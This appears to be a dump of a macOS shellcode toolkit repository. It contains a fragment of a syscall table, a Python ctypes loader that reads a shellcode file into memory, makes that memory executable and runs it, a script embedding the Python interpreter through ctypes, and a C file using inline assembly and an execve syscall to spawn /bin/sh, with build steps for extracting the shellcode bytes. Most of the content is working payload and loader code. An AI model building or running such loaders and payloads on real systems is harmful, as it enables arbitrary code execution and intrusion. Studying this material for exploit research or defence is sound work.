423 AUE_SEMWAITSIGNAL ALL { int __semwait_signal_nocancel(int cond_sem, int mutex_sem, int timeout, int relative, int64_t tv_sec, int32_t tv_nsec) NO_SYSCALL_STUB;}
;#endif
424 AUE_MAC_MOUNT ALL { int __mac_mount(char *type, char *path, int flags, caddr_t data, struct mac *mac_p); }
425 AUE_MAC_GET_MOUNT ALL { int __mac_get_mount(char *path, struct mac *mac_p); }
426 AUE_MAC_GETFSSTAT ALL { int __mac_getfsstat(user_addr_t buf, int bufsize, user_addr_t mac, int macsize, int flags); }
427 AUE_FSGETPATH ALL { user_ssize_t fsgetpath(user_addr_t buf, size_t bufsize, user_addr_t fsid, uint64_t objid) NO_SYSCALL_STUB; } { private fsgetpath (File Manager SPI) }
428 AUE_NULL ALL { mach_port_name_t audit_session_self(void); }
429 AUE_NULL ALL { int audit_session_join(mach_port_name_t port); }

--------------------------------------------------------------------------------
/loader/contained-py.py:
--------------------------------------------------------------------------------
import ctypes
import threading
import sys
import os
import errno


def execute():
    '''
    threaded function for execution in separate thread context.
    TODO: test memory for memory leaks with Py_Initialize()
    '''
    OSX_PY_DYLIB27 = '/usr/lib/libpython2.7.dylib'
    OSX_PY_DYLIB26 = '/usr/lib/libpython2.6.dylib'
    PROGRAM_NAME = 'load-test'
    SIMPLE_STRING = "print 'Hi from the python matrix!'\n"
    PY_HOME = '/usr/lib/python2.6/'

    print "-------------------------------------------"
    libpy27 = ctypes.CDLL(OSX_PY_DYLIB27, use_errno=True)
    if not libpy27:
        print "Error loading C library: %s" % errno.errorcode[ctypes.get_errno()]
    print "* C runtime library loaded: %s" % OSX_PY_DYLIB27
    print "* C runtime handle at: %s" % libpy27

    libpy26 = ctypes.CDLL(OSX_PY_DYLIB26, use_errno=True)
    if not libpy26:
        print "Error loading C library: %s" % errno.errorcode[ctypes.get_errno()]
    print "* C runtime library loaded: %s" % OSX_PY_DYLIB26
    print "* C runtime handle at: %s" % libpy26

    if (libpy26.Py_SetProgramName(PROGRAM_NAME) == 0):
        print "* Python program name set to: %s" % PROGRAM_NAME
    if (libpy26.Py_SetPythonHome(PY_HOME) == 0):
        print "* Python home set to: %s" % PY_HOME

    libpy26.Py_Initialize()
    if (libpy26.Py_IsInitialized() == 0):
        print "* Python interpreter failed to initialize.."
        exit()
    else:
        print "* Python interpreter successfully initialized!"

    print "* attempting to run python simple string"
    print "-------------------------------------------"
    libpy26.PyRun_SimpleString(SIMPLE_STRING)

    print "-------------------------------------------"
    print "* Python interpreter being finalized"
    libpy26.Py_Finalize()
    exit()


if __name__ == "__main__":
    print "-------------------------------------------"
    print "* Spawning Py thread for thread context"
    t = threading.Thread(target=execute,)
    print "* Thread object starting %s" % t
    t.start()

--------------------------------------------------------------------------------
/loader/loader.py:
--------------------------------------------------------------------------------
import ctypes
import sys
import os
import errno

# mmap/mprotect header defs
PROT_READ = 0x01
PROT_WRITE = 0x02
MAP_ANON = 0x1000
MAP_PRIVATE = 0x0002
PROT_EXEC = 0x04

# static vars
NULL = 0
OSX_LIBC_DYLIB = '/usr/lib/libSystem.B.dylib'

if (len(sys.argv) != 2) :
    print "\nExample: python loader.py shellcode_file.sc\n"
    exit()

print "-------------------------------------------"
libc = ctypes.CDLL(OSX_LIBC_DYLIB, use_errno=True)
libc.restype = ctypes.c_void_p
if not libc:
    print "Error loading C library: %s" % errno.errorcode[ctypes.get_errno()]
print "* C runtime library loaded: %s" % OSX_LIBC_DYLIB

page_size = libc.getpagesize()
print "* Current page size: %s" % page_size

# set return type to pointer object
mmap = libc.mmap
mmap.restype = ctypes.POINTER(ctypes.c_int)
shellcode_buf_pointer = libc.mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
print "* Shellcode buffer pointer: %s" % shellcode_buf_pointer
if (shellcode_buf_pointer == -1):
    print "Error building shellcode buffer: %s" % errno.errorcode[ctypes.get_errno()]

file_size = os.path.getsize(sys.argv[1])
print "* Shellcode file size: %s" % file_size

# set return type to pointer object
fopen = libc.fopen
fopen.restype = ctypes.POINTER(ctypes.c_int)
print "* Shellcode file pointer: %s" % shellcode_buf_pointer
file_handle = libc.fopen(sys.argv[1], "r");
return_val = libc.fread(shellcode_buf_pointer, file_size, 1, file_handle)
if return_val != 1:
    print "Error moving shellcode file into buffer: %s" % errno.errorcode[ctypes.get_errno()]

print "-------------------------------------------"
if (libc.mprotect(shellcode_buf_pointer, page_size, PROT_READ | PROT_EXEC) != 0):
    print "Error RX buffer: %s" % errno.errorcode[ctypes.get_errno()]
print "- Shellcode buffer now RX memory"
print "- Casting pointer to: %s " % shellcode_buf_pointer
print "- Executing shellcode"
# ((void (*)())shellcode_buf_pointer)();
try:
    shell = ctypes.cast(shellcode_buf_pointer, ctypes.CFUNCTYPE(ctypes.c_void_p))
    shell()
except:
    print "Shellcode done...."

#libc.fclose(sys.argv[1])

--------------------------------------------------------------------------------
/shellcode/system-execve-order-file.txt:
--------------------------------------------------------------------------------
_main1

--------------------------------------------------------------------------------
/shellcode/system-execve-shell.c:
--------------------------------------------------------------------------------
//#include


/*
1) compile code:
/usr/local/Cellar/gcc/6.3.0_1/bin/gcc-6 -c test.c --shared -fpic -static -O0 -fno-asynchronous-unwind-tables -D LIB

or for byte savings: (86 bytes)

/usr/local/Cellar/gcc/6.3.0_1/bin/gcc-6 -c test.c --shared -fpic -static -O3 -fno-asynchronous-unwind-tables -D LIB

2) link your code:
ld test.o -o test -S -static -dylib -order_file system-execve-order-file.txt

3) get hex of shellcode of section:
gobjcopy -O binary --only-section=.text test test.output
*/

// int main1();

// int myexec(char* arg1, long arg2, long arg3);

static volatile int myexec(char * arg1, long arg2, long arg3) {
    /*
    asm ( assembler template
        : output operands
        : input operands
        : list of clobbered registers
        );
    // */
    // int a=10, b;
    // asm ("movl %1, %%eax;
    // movl %%eax, %0;"
    // :"=r"(b) /* output */
    // :"r"(a) /* input */
    // :"%eax" /* clobbered register */
    // );
    volatile int x = 0;
    // 0x2000000 selects the BSD (Unix) syscall class on x86_64; 0x3b = 59 is execve
    int y = 0x200003b;
    asm volatile( "movq %4,%%rax;\n\t"
                  "movq %1,%%rdi;\n\t"
                  "mov %2,%%rsi;\n\t"
                  "mov %3,%%rdx;\n\t"
                  "syscall"
                  :"=g"(x)
                  :"g"(arg1),"g"(arg2),"g"(arg3),"g"(y)
                  :"%rcx", "%r11", "%rax", "%rdi", "%rsi", "%rdx"
                );
    return x;

}

int main1() {
    char mystring[] = {'/','b','i','n','/','s','h',0};
    //seteuid(0);
    //fork();
    // char* command="/bin/sh"
    myexec(mystring, 0, 0);
    return 0;
}

--------------------------------------------------------------------------------